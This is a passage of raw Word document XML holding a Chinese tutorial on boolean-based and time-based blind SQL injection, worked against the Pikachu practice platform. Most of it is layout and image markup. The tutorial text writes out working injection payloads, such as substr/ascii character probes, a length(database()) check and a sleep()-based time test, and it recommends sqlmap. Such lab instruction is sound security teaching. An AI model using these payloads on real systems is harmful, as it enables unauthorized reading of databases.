            <wp:extent cx="2435860" cy="1283335"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="1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435860" cy="1283335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="008E1A7B" w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E1A7B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F4F9845" wp14:editId="6B915426">
            <wp:extent cx="2015313" cy="1281650"/>
            <wp:effectExtent l="19050" t="0" r="3987" b="0"/>
            <wp:docPr id="1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2017274" cy="1282897"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE47CA0" w14:textId="77777777" w:rsidR="00FF0F01" w:rsidRDefault="00FF0F01" w:rsidP="00FD2E3F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>采用sql语句中and的方法，返回正确或错误来构造，按照之前的思路构造一个SQL拼接:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>vince' and extractvalue(0,concat(0x7e,version()))#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> 输入后根据返回的信息判断之前的思路不再适用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8DE236" w14:textId="77777777" w:rsidR="00FF0F01" w:rsidRDefault="00FF0F01" w:rsidP="00FD2E3F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0F01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="415621C7" wp14:editId="205A9F65">
            <wp:extent cx="2015313" cy="1281650"/>
            <wp:effectExtent l="19050" t="0" r="3987" b="0"/>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2017274" cy="1282897"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C1485" w14:textId="77777777" w:rsidR="00FF0F01" w:rsidRDefault="00FF0F01" w:rsidP="00FD2E3F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输入语句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>select ascii(substr(database(),1,1))&gt;xx;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过对比ascii码的长度，判断出数据库表名的第一个字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661C2986" w14:textId="77777777" w:rsidR="00F30F4D" w:rsidRPr="00F30F4D" w:rsidRDefault="00F30F4D" w:rsidP="00F30F4D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F30F4D">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F30F4D">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>substr()函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6171F995" w14:textId="77777777" w:rsidR="00F30F4D" w:rsidRPr="00F30F4D" w:rsidRDefault="00F30F4D" w:rsidP="00F30F4D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F30F4D">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>substr(string,start,length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C80A54A" w14:textId="77777777" w:rsidR="00F30F4D" w:rsidRDefault="00F30F4D" w:rsidP="00F30F4D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="194" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F30F4D">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>string(必需)规定要返回其中一部分的字符串。start(必需)规定在字符串的何处开始。length(可选)规定被返回字符串的长度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E51F1C2" w14:textId="77777777" w:rsidR="00F30F4D" w:rsidRDefault="00A34773" w:rsidP="00F30F4D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="194" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FA19FD6" wp14:editId="067DACC9">
            <wp:extent cx="5505770" cy="4210851"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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517716" cy="4219987"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B46C47" w14:textId="77777777" w:rsidR="00A34773" w:rsidRDefault="00895A62" w:rsidP="00F30F4D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="194" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>那么通过这个方法，虽然只能通过判断单个字符，我们同样可以使用length来判断表名的长度，判断出长度后就能多次输入payload来爆破出每一个表名的字符。输入语句：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>select length(database())&lt;xx;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>判断表名长度为7。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAAC09A" w14:textId="77777777" w:rsidR="00895A62" w:rsidRPr="00F30F4D" w:rsidRDefault="00895A62" w:rsidP="00F30F4D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="194" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E5A5EE8" wp14:editId="0BF7B37D">
            <wp:extent cx="5271439" cy="2873829"/>
            <wp:effectExtent l="19050" t="0" r="5411" b="0"/>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278120" cy="2877471"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DABA17F" w14:textId="77777777" w:rsidR="00895A62" w:rsidRPr="00895A62" w:rsidRDefault="00895A62" w:rsidP="00895A62">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00895A62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">回到pikachu平台按照之前的逻辑，我们构造语句，如果返回1，那么就会爆出选择的信息，返回0，就会返回 您输入的username不存在！ 。按照之前逻辑，输入sql语句： </w:t>
      </w:r>
      <w:r w:rsidRPr="00895A62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vince' and ascii(substr(database(),1,1))=112#</w:t>
      </w:r>
      <w:r w:rsidRPr="00895A62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，通过这个方法，就能得到后台数据库的名称的第一个字符的ascii码。同之前的办法，我们也可以获得information_schema.tables里的数据。但在实际操作中通常不会使用手动盲注的办法，可以使用sqlmap等工具来增加盲注的效率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5F5EE6" w14:textId="77777777" w:rsidR="008E1A7B" w:rsidRDefault="00895A62" w:rsidP="00FD2E3F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00895A62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38AD87A5" wp14:editId="7439987C">
            <wp:extent cx="2224688" cy="1465625"/>
            <wp:effectExtent l="19050" t="0" r="4162" b="0"/>
            <wp:docPr id="1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227511" cy="1467485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00895A62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00895A62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="609BBB31" wp14:editId="5169213D">
            <wp:extent cx="2155531" cy="1465449"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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2158211" cy="1467271"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C88EA0" w14:textId="77777777" w:rsidR="008E1A7B" w:rsidRDefault="00C320C2"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492D0437" wp14:editId="5F0790C3">
            <wp:extent cx="5278120" cy="2529004"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="18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278120" cy="2529004"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06144747" w14:textId="77777777" w:rsidR="00E35E06" w:rsidRPr="009E7F7C" w:rsidRDefault="00E35E06" w:rsidP="00E35E06">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10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>base on time(</w:t>
      </w:r>
      <w:r w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>时间型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FF1648" w14:textId="77777777" w:rsidR="00940535" w:rsidRPr="00940535" w:rsidRDefault="00940535" w:rsidP="00940535">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="194" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0" w:firstLine="380"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940535">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>到base on time盲注下，输入上个演示中设置好的payload vince' and ascii(substr(database(),1,1))=112#，返回的信息发现不存在注入点。那这样就不能进行注入了？但其实可以通过后端的执行时间来进行注入。这里会用到的payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00940535">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>vince' and sleep(x)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F06AE6D" w14:textId="77777777" w:rsidR="00E35E06" w:rsidRDefault="00940535"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4049806D" wp14:editId="5ED0AB8A">
            <wp:extent cx="1971115" cy="1322095"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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1971128" cy="1322104"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00940535">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0651B417" wp14:editId="07767980">
            <wp:extent cx="2463560" cy="1398494"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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2463932" cy="1398705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E53D4" w14:textId="77777777" w:rsidR="00940535" w:rsidRDefault="00940535" w:rsidP="00940535">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
